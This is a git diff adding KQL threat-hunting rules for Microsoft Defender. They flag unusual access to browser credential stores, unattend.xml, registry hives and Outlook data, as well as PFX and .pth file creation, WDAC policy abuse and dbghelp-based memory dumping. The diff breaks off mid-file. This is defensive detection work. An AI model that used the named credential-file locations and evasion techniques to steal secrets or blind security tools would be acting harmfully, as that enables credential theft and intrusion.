+++ b/KQL/rules-threat-hunting/windows/file/file_access/access_to_browser_credential_files_by_uncommon_applications.kql
@@ -0,0 +1,17 @@
+// Title: Access To Browser Credential Files By Uncommon Applications
+// Author: frack113, X__Junior (Nextron Systems)
+// Date: 2022-04-09
+// Level: low
+// Description: Detects file access requests to browser credential stores by uncommon processes.
+// Could indicate potential attempt of credential stealing.
+// Requires heavy baselining before usage
+// MITRE Tactic: Credential Access
+// Tags: attack.t1003, attack.credential-access, detection.threat-hunting
+// False Positives:
+//   - Antivirus, Anti-Spyware, Anti-Malware Software
+//   - Backup software
+//   - Legitimate software installed on partitions other than "C:\"
+//   - Searching software such as "everything.exe"
+
+DeviceFileEvents
+| where ((FileName contains "\\User Data\\Default\\Login Data" or FileName contains "\\User Data\\Local State") or (FileName endswith "\\cookies.sqlite" or FileName endswith "\\places.sqlite" or FileName endswith "release\\key3.db" or FileName endswith "release\\key4.db" or FileName endswith "release\\logins.json") or FileName endswith "\\Appdata\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not((((InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe") and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\") or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/file/file_access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/windows/file/file_access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql
new file mode 100644
index 00000000..2ae80180
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/file/file_access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql
@@ -0,0 +1,16 @@
+// Title: Access To Chromium Browsers Sensitive Files By Uncommon Applications
+// Author: X__Junior (Nextron Systems)
+// Date: 2024-07-29
+// Level: low
+// Description: Detects file access requests to chromium based browser sensitive files by uncommon processes.
+// Could indicate potential attempt of stealing sensitive information.
+// MITRE Tactic: Credential Access
+// Tags: attack.t1003, attack.credential-access, detection.threat-hunting
+// False Positives:
+//   - Antivirus, Anti-Spyware, Anti-Malware Software
+//   - Backup software
+//   - Legitimate software installed on partitions other than "C:\"
+//   - Searching software such as "everything.exe"
+
+DeviceFileEvents
+| where (FileName contains "\\User Data\\Default\\Cookies" or FileName contains "\\User Data\\Default\\History" or FileName contains "\\User Data\\Default\\Network\\Cookies" or FileName contains "\\User Data\\Default\\Web Data") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not(((InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe") and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/file/file_access/access_to_reg_hive_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/windows/file/file_access/access_to_reg_hive_files_by_uncommon_applications.kql
new file mode 100644
index 00000000..4def8a05
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/file/file_access/access_to_reg_hive_files_by_uncommon_applications.kql
@@ -0,0 +1,12 @@
+// Title: Access To .Reg/.Hive Files By Uncommon Applications
+// Author: frack113
+// Date: 2023-09-15
+// Level: low
+// Description: Detects file access requests to files ending with either the ".hive"/".reg" extension, usually associated with Windows Registry backups.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1112, attack.defense-evasion, attack.persistence, detection.threat-hunting
+// False Positives:
+//   - Third party software installed in the user context might generate a lot of FPs. Heavy baselining and tuning might be required.
+
+DeviceFileEvents
+| where (FileName endswith ".hive" or FileName endswith ".reg") and (not((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/file/file_access/access_to_sysvol_policies_share_by_uncommon_process.kql b/KQL/rules-threat-hunting/windows/file/file_access/access_to_sysvol_policies_share_by_uncommon_process.kql
new file mode 100644
index 00000000..bf68304c
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/file/file_access/access_to_sysvol_policies_share_by_uncommon_process.kql
@@ -0,0 +1,10 @@
+// Title: Access To Sysvol Policies Share By Uncommon Process
+// Author: frack113
+// Date: 2023-12-21
+// Level: medium
+// Description: Detects file access requests to the Windows Sysvol Policies Share by uncommon processes
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.006, detection.threat-hunting
+
+DeviceFileEvents
+| where ((FileName contains "\\sysvol\\" and FileName contains "\\Policies\\") and FileName startswith "\\") and (not((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath contains ":\\Windows\\system32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/file/file_access/access_to_windows_outlook_mail_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/windows/file/file_access/access_to_windows_outlook_mail_files_by_uncommon_applications.kql
new file mode 100644
index 00000000..3987d66e
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/file/file_access/access_to_windows_outlook_mail_files_by_uncommon_applications.kql
@@ -0,0 +1,17 @@
+// Title: Access To Windows Outlook Mail Files By Uncommon Applications
+// Author: frack113
+// Date: 2024-05-10
+// Level: low
+// Description: Detects file access requests to Windows Outlook Mail by uncommon processes.
+// Could indicate potential attempt of credential stealing.
+// Requires heavy baselining before usage
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1070.008, attack.defense-evasion, detection.threat-hunting
+// False Positives:
+//   - Antivirus, Anti-Spyware, Anti-Malware Software
+//   - Backup software
+//   - Legitimate software installed on partitions other than "C:\"
+//   - Searching software such as "everything.exe"
+
+DeviceFileEvents
+| where (FileName contains "\\AppData\\Local\\Comms\\Unistore\\data" or FileName endswith "\\AppData\\Local\\Comms\\UnistoreDB\\store.vol") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not((((InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe") and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\") or (InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\thor.exe"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/file/file_access/unattend_xml_file_access_attempt.kql b/KQL/rules-threat-hunting/windows/file/file_access/unattend_xml_file_access_attempt.kql
new file mode 100644
index 00000000..a83b7774
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/file/file_access/unattend_xml_file_access_attempt.kql
@@ -0,0 +1,11 @@
+// Title: Unattend.XML File Access Attempt
+// Author: frack113
+// Date: 2024-07-22
+// Level: low
+// Description: Detects attempts to access the "unattend.xml" file, where credentials might be stored.
+// This file is used during the unattended windows install process.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001, detection.threat-hunting
+
+DeviceFileEvents
+| where FileName endswith "\\Panther\\unattend.xml"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/file/file_delete/ads_zone_identifier_deleted.kql b/KQL/rules-threat-hunting/windows/file/file_delete/ads_zone_identifier_deleted.kql
new file mode 100644
index 00000000..1b7df97c
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/file/file_delete/ads_zone_identifier_deleted.kql
@@ -0,0 +1,12 @@
+// Title: ADS Zone.Identifier Deleted
+// Author: frack113
+// Date: 2023-09-04
+// Level: low
+// Description: Detects the deletion of the "Zone.Identifier" ADS. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004, detection.threat-hunting
+// False Positives:
+//   - Likely
+
+DeviceFileEvents
+| where FolderPath endswith ":Zone.Identifier"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/file/file_event/creation_of_an_executable_by_an_executable.kql b/KQL/rules-threat-hunting/windows/file/file_event/creation_of_an_executable_by_an_executable.kql
new file mode 100644
index 00000000..be6f72c5
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/file/file_event/creation_of_an_executable_by_an_executable.kql
@@ -0,0 +1,14 @@
+// Title: Creation of an Executable by an Executable
+// Author: frack113
+// Date: 2022-03-09
+// Level: low
+// Description: Detects the creation of an executable by another executable.
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587.001, detection.threat-hunting
+// False Positives:
+//   - Software installers
+//   - Update utilities
+//   - 32bit applications launching their 64bit versions
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith ".exe" and FolderPath endswith ".exe") and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\Microsoft\\Windows Defender\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Windows Defender\\") or (InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework" and InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and FolderPath contains ":\\Windows\\assembly") or (InitiatingProcessFolderPath endswith ":\\Windows\\System32\\msiexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\system32\\cleanmgr.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\dxgiadaptercache.exe" or InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\Dism.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\wuauclt.exe") or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\GitHubDesktop\\Update.exe" and FolderPath contains "\\AppData\\Local\\SquirrelTemp\\") or ((InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\") and InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and FolderPath contains ":\\Windows\\assembly\\NativeImages_") or ((InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\") or (FolderPath contains ":\\Program Files\\" or FolderPath contains ":\\Program Files (x86)\\")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\Update.exe" and (FolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\stage\\Teams.exe" or FolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\stage\\Squirrel.exe" or FolderPath endswith "\\AppData\\Local\\Microsoft\\SquirrelTemp\\tempb\\")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\") or (InitiatingProcessFolderPath contains ":\\Windows\\WinSxS\\" and InitiatingProcessFolderPath endswith "\\TiWorker.exe") or (InitiatingProcessFolderPath endswith ":\\WINDOWS\\system32\\svchost.exe" and FolderPath contains ":\\Windows\\SoftwareDistribution\\Download\\") or (InitiatingProcessFolderPath endswith ":\\Windows\\system32\\svchost.exe" and (FolderPath contains ":\\WUDownloadCache\\" and FolderPath contains "\\WindowsUpdateBox.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\" and InitiatingProcessFolderPath endswith "\\Microsoft VS Code\\Code.exe" and FolderPath contains "\\.vscode\\extensions\\") or FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\" or (InitiatingProcessFolderPath contains ":\\WINDOWS\\TEMP\\" or FolderPath contains ":\\WINDOWS\\TEMP\\") or (InitiatingProcessFolderPath contains ":\\WINDOWS\\SoftwareDistribution\\Download\\" and InitiatingProcessFolderPath endswith "\\WindowsUpdateBox.Exe" and FolderPath contains ":\\$WINDOWS.~BT\\Sources\\")))) and (not(((InitiatingProcessFolderPath endswith "\\ChromeSetup.exe" and FolderPath contains "\\Google") or (InitiatingProcessFolderPath contains "\\Python27\\python.exe" and (FolderPath contains "\\Python27\\Lib\\site-packages\\" or FolderPath contains "\\Python27\\Scripts\\" or FolderPath contains "\\AppData\\Local\\Temp\\")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\SquirrelTemp\\Update.exe" and FolderPath contains "\\AppData\\Local"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/file/file_event/dmp_hdmp_file_creation.kql b/KQL/rules-threat-hunting/windows/file/file_event/dmp_hdmp_file_creation.kql
new file mode 100644
index 00000000..9ac92f18
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/file/file_event/dmp_hdmp_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: DMP/HDMP File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-07
+// Level: low
+// Description: Detects the creation of a file with the ".dmp"/".hdmp" extension. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, detection.threat-hunting
+// False Positives:
+//   - Likely during crashes of software
+
+DeviceFileEvents
+| where FolderPath endswith ".dmp" or FolderPath endswith ".dump" or FolderPath endswith ".hdmp"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/file/file_event/pfx_file_creation.kql b/KQL/rules-threat-hunting/windows/file/file_event/pfx_file_creation.kql
new file mode 100644
index 00000000..8e57d44c
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/file/file_event/pfx_file_creation.kql
@@ -0,0 +1,23 @@
+// Title: PFX File Creation
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: low
+// Description: Detects the creation of PFX files (Personal Information Exchange format).
+// PFX files contain private keys and certificates bundled together, making them valuable targets for attackers seeking to:
+//     - Exfiltrate digital certificates for impersonation or signing malicious code
+//     - Establish persistent access through certificate-based authentication
+//     - Bypass security controls that rely on certificate validation
+// Analysts should investigate PFX file creation events by examining which process created the PFX file and its parent process chain, as well as unusual locations outside standard certificate stores or development environments.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.004, detection.threat-hunting
+// False Positives:
+//   - System administrators legitimately managing certificates and PKI infrastructure
+//   - Development environments where developers create test certificates for application signing
+//   - Automated certificate deployment tools and scripts used in enterprise environments
+//   - Software installation processes that include certificate provisioning (e.g., web servers, VPN clients)
+//   - Certificate backup and recovery operations performed by IT staff
+//   - Build systems and CI/CD pipelines that generate code signing certificates
+//   - Third-party applications that create temporary certificates for secure communications
+
+DeviceFileEvents
+| where FolderPath endswith ".pfx" and (not((FolderPath startswith "C:\\Program Files\\CMake\\" or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe", "C:\\Program Files (x86)\\Microsoft OneDrive\\OneDrive.exe")) and FolderPath endswith "\\OneDrive\\CodeSigning.pfx") or (FolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\" or FolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/file/file_event/python_path_configuration_file_creation_windows.kql b/KQL/rules-threat-hunting/windows/file/file_event/python_path_configuration_file_creation_windows.kql
new file mode 100644
index 00000000..357653c8
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/file/file_event/python_path_configuration_file_creation_windows.kql
@@ -0,0 +1,14 @@
+// Title: Python Path Configuration File Creation - Windows
+// Author: Andreas Braathen (mnemonic.io), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-04-25
+// Level: medium
+// Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.
+// Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.
+// Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.006, detection.threat-hunting
+// False Positives:
+//   - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification.
+
+DeviceFileEvents
+| where (FolderPath endswith ".pth" and FolderPath matches regex "(?i)\\\\(venv|python(.+)?)\\\\lib\\\\site-packages\\\\") and (not((InitiatingProcessFolderPath endswith "\\python.exe" and (FolderPath endswith "\\pywin32.pth" or FolderPath endswith "\\distutils-precedence.pth"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/file/file_event/scheduled_task_created_filecreation.kql b/KQL/rules-threat-hunting/windows/file/file_event/scheduled_task_created_filecreation.kql
new file mode 100644
index 00000000..6d47da3f
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/file/file_event/scheduled_task_created_filecreation.kql
@@ -0,0 +1,12 @@
+// Title: Scheduled Task Created - FileCreation
+// Author: Center for Threat Informed Defense (CTID) Summiting the Pyramid Team
+// Date: 2023-09-27
+// Level: low
+// Description: Detects the creation of a scheduled task via file creation.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005, attack.s0111, car.2013-08-001, detection.threat-hunting
+// False Positives:
+//   - Normal behaviour on Windows
+
+DeviceFileEvents
+| where FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\SysWOW64\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/file/file_event/vscode_code_tunnel_execution_file_indicator.kql b/KQL/rules-threat-hunting/windows/file/file_event/vscode_code_tunnel_execution_file_indicator.kql
new file mode 100644
index 00000000..8765c14f
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/file/file_event/vscode_code_tunnel_execution_file_indicator.kql
@@ -0,0 +1,12 @@
+// Title: VsCode Code Tunnel Execution File Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-25
+// Level: medium
+// Description: Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility. Attackers can abuse this functionality to establish a C2 channel
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, detection.threat-hunting
+// False Positives:
+//   - Legitimate usage of VsCode tunneling functionality will also trigger this
+
+DeviceFileEvents
+| where FolderPath endswith "\\code_tunnel.json"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/file/file_event/wdac_policy_file_creation_in_codeintegrity_folder.kql b/KQL/rules-threat-hunting/windows/file/file_event/wdac_policy_file_creation_in_codeintegrity_folder.kql
new file mode 100644
index 00000000..84723fd6
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/file/file_event/wdac_policy_file_creation_in_codeintegrity_folder.kql
@@ -0,0 +1,12 @@
+// Title: WDAC Policy File Creation In CodeIntegrity Folder
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2025-01-30
+// Level: medium
+// Description: Attackers can craft a custom Windows Defender Application Control (WDAC) policy that blocks Endpoint Detection and Response (EDR) components while allowing their own malicious code. The policy is placed in the privileged Windows Code Integrity folder (C:\Windows\System32\CodeIntegrity\). Upon reboot, the policy prevents EDR drivers from loading, effectively bypassing security measures and may further enable undetected lateral movement within an Active Directory environment.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001, detection.threat-hunting
+// False Positives:
+//   - May occur legitimately as part of admin activity, but rarely with interactive elevation.
+
+DeviceFileEvents
+| where InitiatingProcessIntegrityLevel =~ "High" and FolderPath contains ":\\Windows\\System32\\CodeIntegrity\\" and (FolderPath endswith ".cip" or FolderPath endswith ".p7b")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/file/file_event/webdav_temporary_local_file_creation.kql b/KQL/rules-threat-hunting/windows/file/file_event/webdav_temporary_local_file_creation.kql
new file mode 100644
index 00000000..d50ad721
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/file/file_event/webdav_temporary_local_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: WebDAV Temporary Local File Creation
+// Author: Micah Babinski
+// Date: 2023-08-21
+// Level: medium
+// Description: Detects the creation of WebDAV temporary files with potentially suspicious extensions
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.resource-development, attack.t1584, attack.t1566, detection.threat-hunting
+// False Positives:
+//   - Legitimate use of WebDAV in an environment
+
+DeviceFileEvents
+| where FolderPath contains "\\AppData\\Local\\Temp\\TfsStore\\Tfs_DAV\\" and (FolderPath endswith ".7z" or FolderPath endswith ".bat" or FolderPath endswith ".dat" or FolderPath endswith ".ico" or FolderPath endswith ".js" or FolderPath endswith ".lnk" or FolderPath endswith ".ps1" or FolderPath endswith ".rar" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".zip")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/image_load/amsi_dll_load_by_uncommon_process.kql b/KQL/rules-threat-hunting/windows/image_load/amsi_dll_load_by_uncommon_process.kql
new file mode 100644
index 00000000..8b9686a4
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/image_load/amsi_dll_load_by_uncommon_process.kql
@@ -0,0 +1,12 @@
+// Title: Amsi.DLL Load By Uncommon Process
+// Author: frack113
+// Date: 2023-03-12
+// Level: low
+// Description: Detects loading of Amsi.dll by uncommon processes
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.impact, attack.t1490, detection.threat-hunting
+// False Positives:
+//   - Legitimate third party apps installed in "ProgramData" and "AppData" might generate some false positives. Apply additional filters accordingly
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\amsi.dll" and (not((((InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\") and InitiatingProcessFolderPath endswith "\\ngentask.exe") or InitiatingProcessFolderPath =~ "" or (InitiatingProcessFolderPath endswith ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\Sysmon64.exe") or (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath contains ":\\Windows\\WinSxS\\") or isnull(InitiatingProcessFolderPath)))) and (not((InitiatingProcessFolderPath contains ":\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" and InitiatingProcessFolderPath endswith "\\MsMpEng.exe")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/image_load/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql b/KQL/rules-threat-hunting/windows/image_load/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql
new file mode 100644
index 00000000..32083fcb
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/image_load/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql
@@ -0,0 +1,13 @@
+// Title: BITS Client BitsProxy DLL Loaded By Uncommon Process
+// Author: UnicornOfHunt
+// Date: 2025-06-04
+// Level: low
+// Description: Detects an uncommon process loading the "BitsProxy.dll". This DLL is used when the BITS COM instance or API is used.
+// This detection can be used to hunt for uncommon processes loading this DLL in your environment. Which may indicate potential suspicious activity occurring.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1197, detection.threat-hunting
+// False Positives:
+//   - Allowed binaries in the environment that do BITS Jobs
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\BitsProxy.dll" and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\aitstatic.exe", "C:\\Windows\\System32\\bitsadmin.exe", "C:\\Windows\\System32\\desktopimgdownldr.exe", "C:\\Windows\\System32\\DeviceEnroller.exe", "C:\\Windows\\System32\\MDMAppInstaller.exe", "C:\\Windows\\System32\\ofdeploy.exe", "C:\\Windows\\System32\\RecoveryDrive.exe", "C:\\Windows\\System32\\Speech_OneCore\\common\\SpeechModelDownload.exe", "C:\\Windows\\SysWOW64\\bitsadmin.exe", "C:\\Windows\\SysWOW64\\OneDriveSetup.exe", "C:\\Windows\\SysWOW64\\Speech_OneCore\\Common\\SpeechModelDownload.exe")))) and (not(InitiatingProcessFolderPath =~ "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/image_load/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql b/KQL/rules-threat-hunting/windows/image_load/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql
new file mode 100644
index 00000000..0bbcb478
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/image_load/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql
@@ -0,0 +1,15 @@
+// Title: Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process
+// Author: Perez Diego (@darkquassar), oscd.community, Ecco
+// Date: 2019-10-27
+// Level: medium
+// Description: Detects the load of dbghelp/dbgcore DLL by a potentially uncommon or potentially suspicious process.
+// The Dbghelp and Dbgcore DLLs export functions that allow for the dump of process memory. Tools like ProcessHacker, Task Manager and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.
+// As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.
+// Keep in mind that many legitimate Windows processes and services might load the aforementioned DLLs for debugging or other related purposes. Investigate the CommandLine and the Image location of the process loading the DLL.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001, detection.threat-hunting
+// False Positives:
+//   - Debugging scripts might leverage this DLL in order to dump process memory for further analysis.
+
+DeviceImageLoadEvents
+| where ((FolderPath endswith "\\dbghelp.dll" or FolderPath endswith "\\dbgcore.dll") and (InitiatingProcessFolderPath endswith "\\bash.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\dnx.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\monitoringhost.exe" or InitiatingProcessFolderPath endswith "\\msbuild.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\regsvcs.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\sc.exe" or InitiatingProcessFolderPath endswith "\\scriptrunner.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not((((InitiatingProcessCommandLine endswith "-k LocalServiceNetworkRestricted" or InitiatingProcessCommandLine endswith "-k WerSvcGroup") and InitiatingProcessFolderPath endswith "\\svchost.exe") or ((InitiatingProcessCommandLine contains "/d srrstr.dll,ExecuteScheduledSPPCreation" or InitiatingProcessCommandLine contains "aepdu.dll,AePduRunUpdate" or InitiatingProcessCommandLine contains "shell32.dll,OpenAs_RunDL" or InitiatingProcessCommandLine contains "Windows.Storage.ApplicationData.dll,CleanupTemporaryState") and InitiatingProcessFolderPath endswith "\\rundll32.exe") or (InitiatingProcessCommandLine endswith "\\TiWorker.exe -Embedding" and InitiatingProcessCommandLine startswith "C:\\WINDOWS\\WinSxS\\"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/image_load/microsoft_excel_add_in_loaded.kql b/KQL/rules-threat-hunting/windows/image_load/microsoft_excel_add_in_loaded.kql
new file mode 100644
index 00000000..1d440713
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/image_load/microsoft_excel_add_in_loaded.kql
@@ -0,0 +1,12 @@
+// Title: Microsoft Excel Add-In Loaded
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-12
+// Level: low
+// Description: Detects Microsoft Excel loading an Add-In (.xll) file
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002, detection.threat-hunting
+// False Positives:
+//   - The rules is only looking for ".xll" loads. So some false positives are expected with legitimate and allowed XLLs
+
+DeviceImageLoadEvents
